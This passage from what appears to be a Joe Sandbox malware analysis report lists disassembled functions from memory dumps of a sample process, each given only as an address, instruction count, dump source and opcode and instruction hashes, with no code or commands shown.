                                                      • Opcode Fuzzy Hash: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction Fuzzy Hash: 28012B55D8EA523DD70D7678B8550F87B90DF0223DF0C91B7D08C890A3DE0C54888798
                                                      Function 00007FF848E9D67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7da1f8c626040ba2d39e2a8faede11ef652f9d895f9a4c864b15871c5d76ce15
                                                      • Instruction ID: b96912148daa387f3a947f2bcb32663f72c3fcc5b412cd03d6aff7b729664b42
                                                      • Opcode Fuzzy Hash: 7da1f8c626040ba2d39e2a8faede11ef652f9d895f9a4c864b15871c5d76ce15
                                                      • Instruction Fuzzy Hash: F1018432F089198FEB54EAA8D4803FC77E2FF983A4F154031D11DE7182DBB9A8868754
                                                      Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction ID: da91f375dc5599344ca1df00f15f25292241926f59e6661ae6487aab0bb471cd
                                                      • Opcode Fuzzy Hash: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction Fuzzy Hash: 5D018C35A0D7999FE702FB28C4442DDBFB0FF42360F5545B6C080EB292DA386A498B84
                                                      Function 00007FF848E744B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction ID: dd01ee92180bff2e5874e42875fdcc9f89b96b25fcd15fd5d170a9757a2e9270
                                                      • Opcode Fuzzy Hash: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction Fuzzy Hash: FCF04C31D0C5C60FE722B62484142B937D1BFA2354F1902BBC04EC71D3EE3C69068355
                                                      Function 00007FF848E7833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 293302bcbb1353c254c0de96d15e094d14a7f8a4cd2b5f968b1deff36a1a94ac
                                                      • Instruction ID: 00ba5071d59965b419206cbe6e0b4d60fd3bdb40a0d5721c244f843e373737f9
                                                      • Opcode Fuzzy Hash: 293302bcbb1353c254c0de96d15e094d14a7f8a4cd2b5f968b1deff36a1a94ac
                                                      • Instruction Fuzzy Hash: C401AD21E0C85A8FFA94FA188455AB83391FF69340F2441F6D80DE32C6DF387D428B84
                                                      Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction ID: 350b085cc9f45d6b72126a22592a5e4c0f9cb2c449459990c362e321c0736669
                                                      • Opcode Fuzzy Hash: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction Fuzzy Hash: 5E017C7190D7899FE702EB78C8442DDBFB0FF42354F5541E6D040EB292DA386A49C781
                                                      Function 00007FF848E64F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5914ab6c2e45fe12439fe2748f948bd2dcc9ef0688c072ad644061ef5f355760
                                                      • Instruction ID: 09f91dcd0d13411fd0a141ec0af8e2dda0b586dae589811671071539e86b13df
                                                      • Opcode Fuzzy Hash: 5914ab6c2e45fe12439fe2748f948bd2dcc9ef0688c072ad644061ef5f355760
                                                      • Instruction Fuzzy Hash: 8E018F31E0D5668FEBA2FA28855467867A0FF64360F9401FAC40EF3296DF397D418785
                                                      Function 00007FF848E9B0D2 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f155b2f3c685c0b86544d4997d912a4b022c3093374f07734fd71a14863df03c
                                                      • Instruction ID: bb144dea05e992320ecfece2e3fb50a510f5c6dd1abb61a7d4836af0cdaf41e8
                                                      • Opcode Fuzzy Hash: f155b2f3c685c0b86544d4997d912a4b022c3093374f07734fd71a14863df03c
                                                      • Instruction Fuzzy Hash: E6F09020E1D94A8FE685F76940993B9BAD1FF99748F5400B6C40CC32D3DF7868C58716
                                                      Function 00007FF848E9AD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction ID: 6143e93645d54ca7bcd398063c426f1bb13e5548f075ae2fb87ffdba801275dd
                                                      • Opcode Fuzzy Hash: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction Fuzzy Hash: A7F0EC31B0CBC44FC729553D54550617FF1DB5B51634903EFC096C76A3DD54AC868341
                                                      Function 00007FF848E62B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 1eefac10af07d2f6764c7d5310106f9e712c5777091c62acccfbc6035f594056
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: A9F0E13094C85E8EEBB4FA14C8456E873A2FB91391F9446B5D40DF31A2DFB879818B48
                                                      Function 00007FF848E73FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 059c5ad437c1af141df8188847a7a75941f1d06d52c580926846bf336ad759c0
                                                      • Instruction ID: 6e9563db7c36d3447dccb207c65e48f54bfc587ec42f812993859e39d846c09d
                                                      • Opcode Fuzzy Hash: 059c5ad437c1af141df8188847a7a75941f1d06d52c580926846bf336ad759c0
                                                      • Instruction Fuzzy Hash: A5F04470E0890F8FEB98EA4CC8556FE77B1FB54351F00063AC02AD3284EF786A418B84
                                                      Function 00007FF848E96DD5 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a174e5d8d327fcfd0b6ada04cc51053237fe38e7a78e5302a4778952bd7b2cb
                                                      • Instruction ID: 1f6979b68343bc3af34ed79350ccb2159ceea1186dbab57bd5b9c1b3c4a59cdf
                                                      • Opcode Fuzzy Hash: 2a174e5d8d327fcfd0b6ada04cc51053237fe38e7a78e5302a4778952bd7b2cb
                                                      • Instruction Fuzzy Hash: 4AE0227090D6C44FCB06EB38C8180603FE1EB67500B8D82FBD088CB1B3EA5A888A8341
                                                      Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction ID: 47d914266f96cfb6da44dd35075882d88eb662c4aea8b793287e59a9cc795dae
                                                      • Opcode Fuzzy Hash: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction Fuzzy Hash: 1CF0E53925EA85DFD742AB3DC8A58D4BF60FF03104F9A01EAD089CB963C315685DCB41
                                                      Function 00007FF848E747C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 66eb19dda980de2539f7eeb938ae82c16127b13bfe86e8d1e042379045c94a82
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 24F03A30E1C5468EFA58BA1894806B93291FF54794F114575D85A932C7EF38A8524688
                                                      Function 00007FF848E93459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction ID: 1cb5ddb4e150951ad8ec1e1b42a13cb8b96e67d87835a2c8291b5281b30c714f
                                                      • Opcode Fuzzy Hash: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction Fuzzy Hash: 52E09220709BC84FC70EA6384868560BFF1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848E79302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: a83428b990fd2e542995a4f4cf24e85f3fd32e66ef46288f28e9d3cdadcad013
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: 7DE01531A189098FEB94FB68D4456EC73A1FF49250F5400B6D00ED7292CA35A8118B44
                                                      Function 00007FF848E9A8E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction ID: 7e3361eed1f5e917689d6ebe4feababae252d6803e662a37caff99b8361c71d9
                                                      • Opcode Fuzzy Hash: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction Fuzzy Hash: 08E09230609B844FC70AA6288869520BBA1EF6710178A42EBC005CB1A3DA19DC88C741
                                                      Function 00007FF848E9A859 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction ID: bd8b58859d4076fb609418eb0e9cef636a281979e56b0bc043ec5559406b2354
                                                      • Opcode Fuzzy Hash: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction Fuzzy Hash: 64E09230609B844FC70AA6288869520BBF1EF6A10178A42EBC005CB1A3DA19DC89C741
                                                      Function 00007FF848E97C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction ID: 3b790c5fedc380422d55cfe9582ec60f94e04ec5b7558383d10eaca055c29755
                                                      • Opcode Fuzzy Hash: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction Fuzzy Hash: 80E04F34A8E7C04FC70AA73888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848E9D969 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction ID: 315b248e4b6228ec9ad315496e7f88821b5a010a995358705c2715075673ab8d
                                                      • Opcode Fuzzy Hash: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction Fuzzy Hash: EDE0863164A7804FC30956288C698543BB1DF67111B5641DAC045CF673D61EDC89C701
                                                      Function 00007FF848E9D8E9 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction ID: 7c3d38eaf0a35be235a7287bcf9d0aab9b34bd2ebfd2bcbf713ab54be9d6b698
                                                      • Opcode Fuzzy Hash: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction Fuzzy Hash: 79E04F3164A7804FC30A56288C698543BB19F67111B5A41DAC045CF6B3D61ADC88C702
                                                      Function 00007FF848E75100 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction ID: 4a7b6bca2c18ab1e76a1545fbd5070b9c907dbc633d39fb8da44e7bf878f86b1
                                                      • Opcode Fuzzy Hash: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction Fuzzy Hash: 8FD05E30B609094B8B4CB62D8459434B3D1F7AA2067D45278940BC3281ED25ECC68B84
                                                      Function 00007FF848E9A900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E9A870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E99239 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b323ea65f0d69d6319091732661e3e27e3172cec70c7522890bd877d72fc47ce
                                                      • Instruction ID: a200a171d0cba60626f87d9789dd4aaead703030232136c5746e2fca3daa07be
                                                      • Opcode Fuzzy Hash: b323ea65f0d69d6319091732661e3e27e3172cec70c7522890bd877d72fc47ce
                                                      • Instruction Fuzzy Hash: 72E0EC3150A7844FC70A972488A99403FB0EE2B21178A01C7D045CB5B3E6598C89C752
                                                      Function 00007FF848E63824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Function 00007FF848E9D029 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction ID: fd5e002d15d490e9fc1417daa2cbb9a4321dfeb680e7be21b7b08ebdf7e14038
                                                      • Opcode Fuzzy Hash: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction Fuzzy Hash: 59E0123150A7854FC30A9B28C8A99547FB0EF27211B9701D7C005CF573D61DDC99C751
                                                      Function 00007FF848E92290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848E971D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 97D01234B549054FC70CBA388C99C747391EB6E216B9540A9D00AD73B5DA6ADC89C741
                                                      Function 00007FF848E9BB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 11a9089a325351e74b09ddd1052655bbc03aa67a49e6dbc6211aa68b6dca963e
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BED01234B549084FC70CB738D85987473A1EB6A216B9540A9D00AC72B1DAAADC89C741
                                                      Function 00007FF848E985F8 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction ID: 2b96d45ef71432857712c683db16e96e9eb7f5b491d608a39e16b13a73cadc41
                                                      • Opcode Fuzzy Hash: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction Fuzzy Hash: 3DC08C305548084FCB0CFB28C898C64B3E0FB6A305BC100A8D00EC71B0EAAA9C88CB82
                                                      Function 00007FF848E992CA Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
